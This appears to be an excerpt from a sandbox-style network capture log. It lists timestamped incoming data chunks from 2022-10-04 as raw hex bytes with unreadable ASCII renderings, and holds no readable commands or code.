                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22856INData Raw: cb e1 17 eb ec 5c 48 5d a0 f5 f8 b7 b0 19 0b a1 8c 36 f7 15 52 3f e5 22 8d c1 34 e2 14 ea a0 00 dc f8 9f 31 77 de ed 5b 9d 90 02 6b c5 87 e3 ee 2e 11 04 17 3f 2b 08 38 4e 21 dc c8 cd af 8b f7 41 51 7c 80 41 b7 74 5d 59 af 7d 67 9d c5 98 6b 53 7a d7 2d 0a be a9 72 5c 1b 07 f1 84 9a df 4b e9 49 e0 68 2c 35 4d 29 b7 8a 19 ee f7 f1 fe ef ad 55 67 ed dc da a4 ea 26 be 51 ed 4a ad 7f fc 8e b1 54 ac ad f6 4f 25 b8 80 9b 90 7a 7f 5b 56 dd 2e 1e 5f d2 61 73 b6 a8 c3 b2 73 31 59 69 b7 eb 52 54 4b 4e 89 0d 11 ba 69 cb bc 31 9f c3 8b 0d 9d 33 cb ed 59 5e 7b 8d cd 06 85 bb 4a cf b0 ef 68 2a 12 a2 42 8c 61 7b f7 78 0e 5d 36 51 ec 2e 05 83 14 c9 ec ef 2d 28 4b 7e d0 15 11 77 d2 9a 7f 2c d3 fc a6 0d a1 c2 15 4e 25 fc 00 da 19 df ee a5 b7 92 e3 94 13 19 df 67 1b e2 c4 a5
                                                                                                                                                                                                                                    Data Ascii: \H]6R?"41w[k.?+8N!AQ|At]Y}gkSz-r\KIh,5M)Ug&QJTO%z[V._ass1YiRTKNi13Y^{Jh*Ba{x]6Q.-(K~w,N%g
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22872INData Raw: d2 60 d4 0a d2 8a 8b 2f ac 60 0a 56 a1 c6 b0 33 a0 9a e8 30 ae 83 a7 5e a2 ea db bd 9e 89 b0 30 08 de fb 29 53 35 18 87 df be eb 74 73 54 1a 96 ff df 2e da fc 59 28 6f a9 8c 48 6b 59 50 e5 c3 38 dd 72 5d cd 27 1d 9b d8 57 86 65 f9 dd 0d 39 04 dc af 0f a6 29 e1 02 e8 3d 40 7c f8 3b ac 4a f7 4f 14 25 b5 28 a3 7a 86 0f 9e 47 62 11 46 45 0b e9 05 cc ef 02 8f cd f8 85 21 d1 4c d0 97 ba d5 3e e6 83 dc a2 64 81 85 e1 e6 1c 95 8f 31 16 5f d8 cf bc 05 f8 b0 5c 46 f8 b3 a9 c8 4a 34 7e c3 5d 44 e7 88 be 4c 65 69 b7 f5 5d 38 cb c5 c6 05 e1 d4 70 a1 1c be da 66 be 67 62 ba 22 f4 80 0d e5 0a bd 92 e5 45 e2 1c 82 22 1d 40 11 13 e8 74 83 65 3a bc a0 06 ab bd f8 ce a2 84 96 af c3 e8 32 93 5b 02 80 29 97 fa df 98 60 55 98 bf 30 6b 58 d5 83 37 77 36 5e 6d 6e f4 fb 4c c3 9f
                                                                                                                                                                                                                                    Data Ascii: `/`V30^0)S5tsT.Y(oHkYP8r]'We9)=@|;JO%(zGbFE!L>d1_\FJ4~]DLei]8pfgb"E"@te:2[)`U0kX7w6^mnL
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22888INData Raw: e5 be 83 bd e1 1e 1d 08 9f db c8 1e 45 f2 88 1c f2 b1 2f f3 ae 86 c3 f5 f0 09 a2 86 a6 ec a9 11 d8 d7 fd 47 29 63 e7 38 e9 bd b2 b9 56 79 dd a4 05 27 1b fc eb c6 90 45 9b e0 a2 bd c4 99 21 40 f9 a4 c5 01 82 79 e5 71 2e 31 8c 91 10 28 d5 1e 32 b0 cd 31 04 a5 aa 6b fe 60 77 92 35 90 44 fc bd c4 fd 82 aa c3 f7 da 93 c6 7b 26 d9 f9 fb 87 a6 ef c5 5b 54 2d 9d d2 0f 79 d9 86 c2 48 44 bb 5c c1 2c 55 49 8a cc b3 d7 a9 aa 10 23 41 1f ee 81 65 b7 e9 c1 5b 5d 16 5a f6 f9 2a 11 63 55 49 ef 24 f0 ed 44 48 d6 a2 fc fe c7 ab 88 7c 64 37 0d 2b 5d 84 3d 47 30 f4 68 53 b3 7c ce 4f 08 f8 72 7c 41 8d 87 d0 00 ab f2 a0 1c b7 92 32 71 52 c1 7e 12 c3 f5 3d a7 24 69 d6 46 f6 d9 10 f5 62 08 c5 73 c4 5b 78 fe 55 19 4d f4 21 f4 f2 8a 09 ed 52 3c 82 1b 46 df a4 23 d1 84 aa 2d 27 92
                                                                                                                                                                                                                                    Data Ascii: E/G)c8Vy'E!@yq.1(21k`w5D{&[T-yHD\,UI#Ae[]Z*cUI$DH|d7+]=G0hS|Or|A2qR~=$iFbs[xUM!R<F#-'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22904INData Raw: d4 5b 05 7d 2a 00 30 58 bf c3 ef d5 21 43 0b 92 ae f8 f0 7a 3f c4 f8 92 82 d6 e1 46 2c ef 58 1b 34 b4 52 eb 3f 0b a7 b5 2c c9 f2 33 0c 0b 9d 0a 57 5f 84 cc 62 b0 5c 44 6a de e3 8a 31 ef d8 e9 4e 1a de 8d 80 ce 08 e6 2f 1f 32 5f e1 dd 5f 4d b1 28 4e 84 48 45 63 60 8c 45 29 41 78 13 5b d7 7b 17 82 9c a3 b1 80 f9 bf 04 9f 64 0d 49 1e 1c fe 44 c4 1c 5f 69 b1 18 50 13 aa 81 81 44 d2 d3 f8 84 b7 d2 64 14 07 c2 42 f3 2a 2f ac eb eb 75 80 6f 0e d1 d0 e8 87 16 92 71 09 37 d5 7e 65 a5 a1 34 36 2f bc 8c 04 4d 9d cb 8d 01 e1 2a f1 1f 5f a6 2d e0 31 ce bc 6c 6c d0 eb 38 7c 64 9c b8 11 8a 8c ea fa 4e 22 29 47 1f c0 47 90 01 f8 c8 b9 b1 aa 28 a9 3f d2 d3 0b a3 e8 d5 32 58 83 ba fd 3e 4a f7 b5 9e 90 2c 83 a5 62 fc 33 c9 71 b4 bd da db 65 cd b7 bd b8 93 92 b0 ee 22 a7 b6
                                                                                                                                                                                                                                    Data Ascii: [}*0X!Cz?F,X4R?,3W_b\Dj1N/2__M(NHEc`E)Ax[{dID_iPDdB*/uoq7~e46/M*_-1ll8|dN")GG(?2X>J,b3qe"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22920INData Raw: e6 fc 3e 17 db 9b 48 15 68 7e 8a 58 30 5f 43 e6 4b f5 78 53 68 6f 80 81 76 bc e5 e1 39 a1 8e 31 5c 13 f3 aa 94 ba 4e bc fe a3 d2 df 51 0f a6 cb da c8 9e 7b eb 29 57 9e ab 8a 3f e0 80 ce 73 36 10 18 68 dc 59 d6 ba f2 1a 55 3a 17 8e f4 f6 91 ca 4d dd d5 a2 70 50 2c 54 78 d4 47 c6 fe fa 2f de a7 69 36 e6 fd 30 5d be ca 54 20 e1 f6 cd 2c 57 59 e0 58 09 f5 e5 b9 a7 0d cf d5 3f 65 be ce 8f cc f7 11 ef be c1 47 81 0a 50 3c 48 0c 91 a0 f8 ef 66 46 d5 02 d8 f5 3b 5f bf e8 16 97 e2 89 50 b1 e3 02 04 cb 3d 2a 13 d0 ef 4f 80 32 f2 51 81 8c b8 1c b2 f8 1f ec d5 df a5 dc 4e bf 7d 76 01 17 3d 20 13 80 7f fe e2 94 f7 8f 6a 0d 5e a6 47 ec bb 9e eb 3e 97 2a c1 d0 f8 8b 2e 66 14 20 c3 bd ad 76 84 c8 d0 75 93 82 2a c8 e0 f3 85 80 64 32 81 0e ee 23 f1 d2 8e 68 f3 bc b8 a1 b1
                                                                                                                                                                                                                                    Data Ascii: >Hh~X0_CKxShov91\NQ{)W?s6hYU:MpP,TxG/i60]T ,WYX?eGP<HfF;_P=*O2QN}v= j^G>*.f vu*d2#h
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22936INData Raw: 82 9e 36 e1 94 51 69 90 48 f4 ea b8 c8 61 d7 1e 74 46 69 57 95 37 31 d0 ea 77 1e 51 87 98 2b f8 c9 5c 57 72 d8 df 4e f9 10 d6 b5 aa 2c 7a 85 83 7e d9 94 f6 71 bc ff b0 a0 3b f4 e0 79 ab 1d 9b 8c 3c 45 c0 0e 9f 83 ca d0 01 19 c6 62 8b d0 dc ce 93 dd b4 9a af f9 64 90 84 8f 96 d6 74 3f ca 3c 8c 88 b0 72 2e 50 2b b8 01 29 3c c3 89 a0 b6 89 db 89 85 44 3f 52 55 36 6b 20 cf a5 0b 66 72 83 63 23 6d 06 f3 f0 dd 08 da a0 eb 22 77 17 1b 12 25 1f 8f 85 7c 64 1f 36 a7 3c b1 bd 26 bd bf 27 ef db ad ab d2 80 fa d2 d4 d9 13 97 c5 9f 3e c5 0e 2c 60 87 1f 1a 92 33 b5 82 24 90 d3 d9 35 fa ef 65 ab 26 40 26 06 9b 86 27 07 04 46 20 d7 b6 c8 0a e1 a6 1f 4e 88 84 30 54 ed ca b3 a7 c6 4a 48 d2 8f b0 1e c2 50 89 3e 13 c2 6e 7d 12 24 a3 07 a9 28 97 c2 98 30 02 c0 0a 20 40 62 61
                                                                                                                                                                                                                                    Data Ascii: 6QiHatFiW71wQ+\WrN,z~q;y<Ebdt?<r.P+)<D?RU6k frc#m"w%|d6<&'>,`3$5e&@&'F N0TJHP>n}$(0 @ba
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22952INData Raw: 6c cf db 5b 2d 45 62 87 c2 75 c8 ef 51 8a 12 1f 85 57 f8 fa 82 15 20 77 ff 60 4a f4 ac d3 8f 13 88 e5 85 13 a6 9e 0a 54 38 96 c7 7e ed 8e ed 8b 31 72 f2 77 de 49 35 c6 16 30 ec c5 4b 55 51 d1 7e 2f f5 70 51 47 0e 1b b8 49 0e 01 84 3d 5a 0f e9 e5 f2 48 8f 10 15 96 e9 0e d9 f5 8e 44 2e ad c1 e0 d0 cb 60 52 48 f7 6d 3e a5 a8 cb 1f e0 86 d0 38 49 a4 c1 74 0e 98 43 55 78 e9 7a ee 5a 42 74 de bd 7a d9 ba 30 9c cb 98 42 1a 22 fd 39 c6 0f 17 21 71 3f 79 f3 be 9a 3c b3 31 fc e3 b0 b4 e0 73 2b e1 8e ba be 62 41 7b 1d b7 91 56 48 5b 04 ad 0c 8b 94 d1 0d 59 4d 70 26 87 f8 f5 12 f1 38 6a 52 e3 ad fb 1c 85 72 c1 c6 8b 22 e4 ca 77 19 6f bc 9e 1e dc 9c f4 0b 82 c2 30 b6 c2 f0 05 34 7e f2 1c 97 a9 83 3e 2a 17 ac b0 78 3b 96 82 58 35 ed 37 32 49 85 29 2b e7 6f 14 a2 82 12
                                                                                                                                                                                                                                    Data Ascii: l[-EbuQW w`JT8~1rwI50KUQ~/pQGI=ZHD.`RHm>8ItCUxzZBtz0B"9!q?y<1s+bA{VH[YMp&8jRr"wo04~>*x;X572I)+o
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22968INData Raw: 60 94 50 28 98 82 33 9e 6d 2c df 16 ac 54 ea 19 64 ae de e5 19 9e e4 f2 67 59 38 4f 7e 28 8b dc e2 b2 3e a1 19 09 39 e6 ce ca 42 c8 5a db 32 bf 72 53 ec be 26 b1 4d b5 5d 42 c6 ae fc 79 0c 15 94 3a 9d 4b 4d e6 6b 14 0c 51 e0 45 09 91 52 46 d3 b7 e4 24 80 ff 42 5a 21 d5 70 32 3b 0f 1d 24 b8 2e 98 d8 83 80 db c1 c6 52 63 6e a2 6b e6 18 67 68 f6 ad 26 96 92 b0 ba 01 84 41 92 78 64 9c 83 15 15 70 6c fe 53 77 3d 96 11 2f d6 dd d4 df ec f2 3d 4a 56 03 40 1e c1 e5 5d c9 15 04 d3 a4 86 78 8c d4 b5 70 c8 79 2f 3e 99 d0 78 d8 83 8c 38 b5 ab 56 a4 80 ec 2a 0f c3 41 84 be 7d 4d 93 84 47 4d c5 75 32 42 a3 59 f4 70 a4 3e 86 23 03 ec 43 00 fa b3 e3 df da 3a 58 cc 09 f0 6b aa 5d bf 6e 7c cd 89 1e d3 2b 0a b5 11 6e 2c eb 21 cb 8f 70 da e1 84 b1 5c 6d 6b 6f e4 b5 b3 75 49
                                                                                                                                                                                                                                    Data Ascii: `P(3m,TdgY8O~(>9BZ2rS&M]By:KMkQERF$BZ!p2;$.Rcnkgh&AxdplSw=/=JV@]xpy/>x8V*A}MGMu2BYp>#C:Xk]n|+n,!p\mkouI
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22984INData Raw: 51 5e 35 fa 15 74 5b 6b 27 b6 b4 2e 6a c1 17 ec b0 3d 0e 41 a0 b4 b9 83 ca ff 12 50 44 d9 b4 7c 11 c4 7c 24 34 fe 52 9a a7 5f 5c f2 55 12 f8 9c 62 ce 77 c7 d6 2e 9d e9 37 4a 34 e4 58 e8 6f 08 d7 ba b2 18 15 96 8c 22 ff 28 e0 23 0e c1 20 da c6 d0 22 34 69 75 0b d0 3a ab ba 61 90 49 70 73 e2 63 26 0f c8 0b ab a6 8c 5e 21 92 5e f5 df 23 ee a1 9e f4 1f fd 2b 79 2c ca 26 29 11 08 42 a7 34 24 e1 c5 57 6d 78 f0 db 44 d2 e9 69 6a ff ab 57 36 7a 4b 76 56 dd d9 e5 24 12 66 27 9d 4b b4 fc 25 0c 87 c8 3b 69 1e b9 3e ae 69 af 7c 8f 05 10 1c ff 8c 53 19 cb 3d db 83 bc 87 de ab 63 df ff e8 bc dd cd 9e 71 f1 a5 a9 af b4 3c 15 c7 39 89 84 29 fe 26 d1 9e 1f 34 b8 a2 f0 e6 32 20 d7 c2 5f fb b4 f8 3c 84 88 2a 20 e7 0c 26 91 fa 5b 79 4b 90 db 7e 9b 56 85 ea 86 06 f6 67 79 75
                                                                                                                                                                                                                                    Data Ascii: Q^5t[k'.j=APD||$4R_\Ubw.7J4Xo"(# "4iu:aIpsc&^!^#+y,&)B4$WmxDijW6zKvV$f'K%;i>i|S=cq<9)&42 _<* &[yK~Vgyu
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23000INData Raw: 15 5c 41 f7 22 87 46 94 28 9b 37 0c a1 3c bb 8d 0b 06 f8 d1 df 31 78 b9 ec ed c7 ce de f4 f5 29 25 7c 35 b0 76 b4 16 cc 2f b9 27 79 51 ba 05 d2 80 f6 34 e3 df b5 90 82 b0 ae ce bd cf 92 e3 04 a5 21 41 04 1b 1b 88 b5 61 bb d7 4c bd e3 73 44 86 39 5a 31 3a 10 4e 19 af b4 76 e7 98 00 5f bc b3 6a 60 4e 8e d9 be 79 ad a7 5c 60 8d 4d 88 91 58 5f 09 8b e3 63 1f 23 8c a2 ea 93 3d fc 3c 1b a3 6f e0 da 23 14 24 f6 32 c8 2f 3f 9f 45 f3 74 61 2d 63 a6 a2 b2 c7 5f e3 7d d6 b1 2a 59 0f 6f 57 32 ce 8d 0a e8 d2 7f 6a c9 2e 88 cf 92 f0 28 ba 58 e8 0f 61 54 cf 85 2e 23 d9 eb f7 52 a1 74 58 36 dd 3b a4 1b 9e 0e 0f 67 41 3a 3c d7 83 b8 3d b7 7b d0 0e 4a 1a bc f9 3a c8 75 1d 38 52 91 3d 47 a3 c4 c3 d5 fb 2f df 9e 07 6e 03 00 03 73 60 f0 e8 10 38 90 bd a0 44 dc 31 87 e1 95 eb
                                                                                                                                                                                                                                    Data Ascii: \A"F(7<1x)%|5v/'yQ4!AaLsD9Z1:Nv_j`Ny\`MX_c#=<o#$2/?Eta-c_}*YoW2j.(XaT.#RtX6;gA:<={J:u8R=G/ns`8D1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23016INData Raw: 85 a9 9c 71 27 0a 1b 09 2d 3f ca 24 22 18 8e 6e 23 2f bc 04 31 66 03 30 04 fa 70 59 29 2e 2c 8e 67 16 6e d5 29 e8 1c b5 b1 92 fd 3d 02 cc 4e c3 07 29 74 40 a1 92 a6 25 5e b3 bb b7 e4 b2 6b ac 42 b6 19 a7 97 08 7c 87 7c 8a 13 63 3a 25 f3 12 ab 5d d8 fc 48 b5 55 38 23 ba f7 4f b4 c6 dc a3 ac 4f 65 2c f4 f1 cf 86 45 8d 35 d1 df bf b4 0f ee 47 03 31 cc a8 f5 14 98 78 01 89 9e 9b 06 29 0e a6 a7 cb 2a 5e 30 5a 50 92 56 57 5a 17 b0 f0 e3 e9 d6 9c 65 e3 57 3c 1f 90 98 7c bd 9c c1 ca 81 46 5f de c4 fc ba 2d 10 cf 56 10 83 38 c4 93 8c e1 01 39 29 94 3e 5e 84 4f 6c 8e f8 46 75 d1 6f ae 98 48 cf fb f8 90 73 10 8b 26 1a 61 8d 31 21 7f 21 34 2d 14 87 79 73 6c 78 e9 94 08 ae e6 22 91 95 2d 68 b5 25 bb 5c 69 d5 6e 29 7d 57 61 0c 77 98 29 41 c8 cc 9a 4b ed 70 52 19 9c 96
                                                                                                                                                                                                                                    Data Ascii: q'-?$"n#/1f0pY).,gn)=N)t@%^kB||c:%]HU8#OOe,E5G1x)*^0ZPVWZeW<|F_-V89)>^OlFuoHs&a1!!4-yslx"-h%\in)}Waw)AKpR
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23032INData Raw: a5 81 35 56 03 9d 72 bd e3 17 1c ab da dd df 4e 6d 18 9e b1 fc 75 d3 83 0e 22 fb 2c 01 7c fe 46 5a 38 1c d9 23 fc 21 2a 17 1a 00 68 5f 80 1f 32 98 8b 6b 89 32 69 96 2d 22 3e c7 67 82 06 be 4d 9a 5d e6 79 dd f7 18 00 f1 78 b0 ce 55 d2 c4 8b 1e 01 b5 0f 60 3d 2f e5 e5 45 5e 67 08 02 9b 90 f8 4f 1a bb ec 85 5e e4 95 3c 14 78 e4 db 7a 8c f4 47 ad 44 25 b2 38 c6 f1 1e ff b7 ed f2 05 25 4d 17 2d 14 17 98 a7 09 4f 72 9c a5 bc 70 39 45 a9 5e 83 3c d8 5c fe 6d 64 28 a1 6f e7 12 15 c4 03 4c a7 11 a5 f8 fa c7 b3 3e c9 b3 56 e7 f1 cc 00 9c 3d 5c b8 b1 e3 41 5f 94 3a dc 86 8e 35 b5 d9 a1 80 9d 16 df 60 69 7a 85 05 09 33 f1 d3 19 2c 40 da 6c 41 03 3e a7 bb 6e 2f 6c 5e 92 c3 e6 80 43 62 57 e5 44 48 54 e9 95 36 66 50 f5 f9 72 41 53 03 e9 61 22 2b 5c 8f ff 88 01 a8 de 64
                                                                                                                                                                                                                                    Data Ascii: 5VrNmu",|FZ8#!*h_2k2i-">gM]yxU`=/E^gO^<xzGD%8%M-Orp9E^<\md(oL>V=\A_:5`iz3,@lA>n/l^CbWDHT6fPrASa"+\d
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23048INData Raw: 79 8a 39 94 ec c5 b7 89 2f 59 39 01 c8 6b 0c 39 20 f3 df c2 55 88 72 da b0 2d 07 66 a5 d1 c3 88 11 e1 0f e6 af 6c bb d4 da 75 06 97 66 9f 02 f9 56 da ba 83 16 47 b3 c4 f0 39 29 49 2a 87 20 92 42 8a 97 ce a0 2b 1b 0a d9 f6 d0 d7 e2 1e ff c6 e6 13 d6 9c 8d 7d 9f 3c 57 34 bd 01 c3 0f 44 99 bc 92 7f a4 fb 42 9e b8 4d 54 ea 20 ac 47 c6 e1 2c 25 25 a5 f8 2c c7 d5 e9 29 00 fa 8b b3 20 ed f1 29 f9 e2 72 71 a6 35 31 c0 64 12 b0 3d d2 e0 a9 06 d0 b0 db 91 94 c6 c5 a6 ae 2e 6f d2 40 70 40 34 07 ab 6a d1 ce 2a 35 e5 bd f2 ce c8 60 d0 45 af b7 49 59 4b b4 7e d7 f1 0f 04 4f 36 4f 72 69 b0 37 29 8f 62 cd f7 80 45 94 a9 04 0c 56 08 fc 21 a4 4e 14 25 46 86 2e be 3f f6 31 0f a5 24 9d 53 c5 7d 3f e5 a5 c6 04 b0 c0 5e 5c 42 a6 d4 b2 69 30 65 2b 29 06 dc ef 43 83 6e 8b f4 cd
                                                                                                                                                                                                                                    Data Ascii: y9/Y9k9 Ur-flufVG9)I* B+}<W4DBMT G,%%,) )rq51d=.o@p@4j*5`EIYK~O6Ori7)bEV!N%F.?1$S}?^\Bi0e+)Cn
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23064INData Raw: aa 1f 8f f7 6b e9 65 9e cf 4e 39 db 67 98 56 12 88 37 80 37 09 9c f3 16 51 21 b5 8d 02 a6 49 7b 57 21 68 d3 03 0a b9 4b 46 7a 12 54 a7 00 6f ac 13 dd ab 66 a1 d2 a4 47 ac b9 c9 25 00 ef 98 22 40 07 d6 8f 0e 56 c8 cb be be d2 06 a2 78 e8 cf 1e ca 49 fa 37 69 8f 5e 08 3c b5 67 9f 59 45 12 7d 2a 52 2a 8c 2d 4e 54 36 0c b2 db 07 a4 e1 95 bc 9e 62 3c a1 cd cd b8 b9 f5 c3 80 7f 51 be 34 65 79 81 80 9f c6 c1 3d 64 a7 bd 94 ca 03 d6 75 8a 90 58 17 de b6 80 32 2f dc 0c 13 19 37 bb 30 82 f0 2d a0 41 5a c6 5d 62 1e bc e9 df 33 94 30 a0 be 0d bb ee 09 f6 41 b1 2c 45 28 3f 48 bc 67 ea 40 16 64 94 58 5a f1 06 17 32 46 5e 7f ab d5 8a b9 af d0 eb 7a fd d2 e8 1c b3 7b 6a b6 69 0a d8 6c 16 84 8e 63 64 45 04 11 c0 9c ac 2b aa 60 b7 af 88 78 2d e6 04 06 bb 7c 9f 8a 58 1e 10
                                                                                                                                                                                                                                    Data Ascii: keN9gV77Q!I{W!hKFzTofG%"@VxI7i^<gYE}*R*-NT6b<Q4ey=duX2/70-AZ]b30A,E(?Hg@dXZ2F^z{jilcdE+`x-|X
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23080INData Raw: 7a a2 e6 70 c5 10 70 d8 9c 10 4a cc ee 89 00 c3 71 43 76 7d 18 48 4c 0a c7 cf c1 48 45 1c ca e2 4e a3 b0 98 16 bf 87 e7 e4 a8 8c 28 1c d2 00 fe 4e 8b bc 2f 5a cc 99 84 c0 ac dd e3 47 f3 a3 8c 55 7a 22 05 96 55 d2 86 14 c9 ca cc e4 7b 65 1e 70 98 bd 9f 6c e2 88 2c 79 94 3d ad 53 b6 6c 27 70 c6 b2 44 67 cd 1b aa 5b 5d 60 d8 09 47 6f 65 bc af ff 17 bb 15 66 66 73 c0 df 1e f2 e0 08 6e 42 bc eb 5f de 11 84 e1 f4 56 fe aa 69 1d 6b 33 b3 b0 b9 35 43 26 a9 18 12 ec 9f 50 02 7a 30 77 46 fa 82 05 4f e0 9b b1 ad 65 c7 ce c7 66 58 4f 69 df fa 15 df 45 53 1e e8 eb 59 45 5e 46 63 21 ad 0a a0 69 ed f5 15 fe 60 20 28 b3 03 da 4b a9 02 fe 02 b0 3d a8 ec d1 6c 8f f4 48 19 47 55 67 dd 78 68 35 0b 0d 48 dd 91 05 90 e5 6d 75 2f 00 fe 40 74 c5 de 2d 9b 1d c2 d9 10 f8 e5 92 6c
                                                                                                                                                                                                                                    Data Ascii: zppJqCv}HLHEN(N/ZGUz"U{epl,y=Sl'pDg[]`GoeffsnB_Vik35C&Pz0wFOefXOiESYE^Fc!i` (K=lHGUgxh5Hmu/@t-l
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23096INData Raw: 27 a1 ee b8 6d 5c bd 34 9a d2 b0 24 94 84 08 d6 be 61 fe 8b 17 6c ea 8d 27 7f de 75 de 40 a5 66 ff a0 fa 44 82 c8 e6 3f c1 e9 7d 89 5a c8 2c 0f cc f0 6f ed a5 87 05 cc b0 0e d7 7b 74 4a 39 89 b8 a8 8d 97 71 c6 99 67 12 83 5f 82 c1 91 ca 42 d0 37 75 5e b0 cd 67 57 02 dc 8c ef 92 26 57 79 7d 30 69 c0 76 62 4b 9c 5d 53 30 51 74 ca a2 b6 4b f9 5c 32 cd 45 66 c3 46 81 67 8d 52 15 49 93 68 70 bd c5 41 ff b9 90 d2 f3 64 6f 16 bb a6 07 33 90 ea 5c c0 d4 89 17 8b 90 b3 d4 78 cf 8d 10 45 a0 41 50 49 30 b2 26 ca bd e8 2c 48 74 eb e4 08 f6 56 46 9e f8 5d 41 28 c7 76 de 9a 19 c7 81 b4 86 76 63 b7 0d 40 ba 67 0a c1 72 b1 fe 62 c3 b1 60 04 76 8d 51 75 7e ed bd 64 af 9c 26 8c 71 5c df c6 23 ac 7c 61 ff 31 f7 22 7e 13 ff 6d 53 9f 06 eb 94 69 08 cb e6 b6 e0 c6 bb df 78 b8
                                                                                                                                                                                                                                    Data Ascii: 'm\4$al'u@fD?}Z,o{tJ9qg_B7u^gW&Wy}0ivbK]S0QtK\2EfFgRIhpAdo3\xEAPI0&,HtVF]A(vvc@grb`vQu~d&q\#|a1"~mSix
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23112INData Raw: 1d 11 fc a5 db b7 e9 e3 cd 56 c3 7b d3 0b e8 ea db 76 cb 7e 01 ba f1 b1 0c e0 fb fb 6f e0 41 4a fa 25 bb e4 5f b5 d4 61 f5 fa d3 08 ef 3e db 3a 7c e1 e3 c2 ee 98 01 c6 e9 3f 44 b6 a7 8a 45 0e bb 15 4c d5 60 45 d2 8a 9e fd 9c 0d a3 48 1b 09 e4 bd c2 9b ac b3 26 c7 a6 c1 8d 88 b5 0e df 5b 36 59 75 d0 eb 23 37 35 a3 c6 33 cc ad c7 90 0d 83 f7 1f ba 0b 91 be e7 00 80 5e 06 2a 62 3f 87 1f db 04 7a 7d 1e 0d 7a 2d 9e 84 74 0e 7c c8 b9 c1 fd e3 33 50 3b 7b 12 aa 2a 5d 05 6b 59 e3 68 95 b8 87 de e3 f2 f9 aa bd 2d 76 54 5e c7 bd 5f 6f 81 a9 19 0c fb 93 2d 38 14 f5 b8 21 99 14 8d 84 4e c2 8d 16 e0 b2 06 73 db 06 71 60 74 08 af 95 d1 85 2f 89 71 97 2f eb ba 56 e1 23 21 b9 86 b5 39 f9 f0 ca 2c 78 79 fd 78 b8 ce 35 bc 73 f3 4b 17 34 2a 82 bc 36 11 d7 ea 35 9f 52 91 3d
                                                                                                                                                                                                                                    Data Ascii: V{v~oAJ%_a>:|?DEL`EH&[6Yu#753^*b?z}z-t|3P;{*]kYh-vT^_o-8!Nsq`t/q/V#!9,xyx5sK4*65R=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23128INData Raw: 14 9c eb 51 ef 3c d4 94 65 f7 8b 9d f5 e6 e5 05 70 71 74 08 38 10 ea ee ac 06 bd 85 6c 1e b3 3e df d2 de 57 63 bc 38 75 18 32 f3 1d 8e 60 18 af 02 33 f5 6e 61 e5 1b ff 0a be 4e 69 b3 71 85 05 af cf ab 91 f2 91 93 44 8a 88 37 06 d6 f0 99 d5 95 ce 73 0e 56 48 04 d9 7e 14 34 68 b3 6b 05 c3 d3 c6 71 54 08 62 be d8 73 ed ef d4 cc 84 5b a4 5e b3 0b 68 3e 2a 89 d1 c8 a8 d2 60 b7 6c 3c 14 88 c3 f6 24 f9 ee 91 24 b1 0b e8 c2 3d 1e 5f 80 d0 7b b4 4f 17 01 d0 c5 08 ac ef 5f 68 c5 1f ad d2 52 da d3 4f f7 67 ff 57 36 10 a6 a1 6a 16 fe ed 2e 0e 64 00 b4 ff e5 cd d1 67 c2 d0 2d b9 23 ec ad ce 29 48 e2 cc 2c 6b b9 6b 50 22 e9 6e 02 5b 5d 40 aa dc 7d ef 12 42 6a f1 01 25 76 c3 0e f4 6c 7c 85 27 01 13 7a 54 a1 4b 4d 7a e9 b9 a3 69 55 02 d1 64 18 9c 68 5f f5 25 ec 9e cd f3
                                                                                                                                                                                                                                    Data Ascii: Q<epqt8l>Wc8u2`3naNiqD7sVH~4hkqTbs[^h>*`l<$$=_{O_hROgW6j.dg-#)H,kkP"n[]@}Bj%vl|'zTKMziUdh_%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23144INData Raw: ea 5c 6c 9e 09 ab f1 bc 7a 75 34 11 23 d3 38 17 73 e5 81 8c ed ca 70 3d e3 f2 51 64 2e 72 7a 00 35 f6 13 c0 19 db 6f 77 cd 95 07 44 04 ca 1f c4 cf 7c 37 a7 98 57 8e 51 5e b0 14 d8 75 c4 43 f7 36 3c f3 9d 5c c0 1a c8 d3 f1 36 71 b1 be 74 3c 31 71 a9 d1 2a b4 6b ef 24 1c 03 c3 7b 00 47 ad 18 c7 8a 18 55 31 cb 54 8b d7 45 fb 48 fa c5 59 13 74 d8 10 e8 4a 18 f6 f6 76 27 43 c1 54 d9 a0 5f f8 e6 a4 22 50 80 ae d3 0b dc aa bf 68 69 e4 7d 1a 03 43 f4 30 a2 9e e7 32 86 12 76 0c 4e 23 d9 d6 76 73 07 03 6d 5f 4c af 32 4e 75 81 7e d7 8f e1 33 95 15 92 6f 90 0d c7 c0 2a 91 5c f5 53 53 24 4d e7 39 ee 2d ed 59 9d a2 28 24 1b 69 c5 ca dc 65 aa ea cc c7 00 92 d3 4d 8b b0 5e c6 39 9c f6 d5 86 88 4e a0 b4 0a 7a 15 97 f7 a5 3e e2 15 cf b8 cd 33 32 11 52 15 6e bd fe 9c 9d 17
                                                                                                                                                                                                                                    Data Ascii: \lzu4#8sp=Qd.rz5owD|7WQ^uC6<\6qt<1q*k${GU1TEHYtJv'CT_"Phi}C02vN#vsm_L2Nu~3o*\SS$M9-Y($ieM^9Nz>32Rn
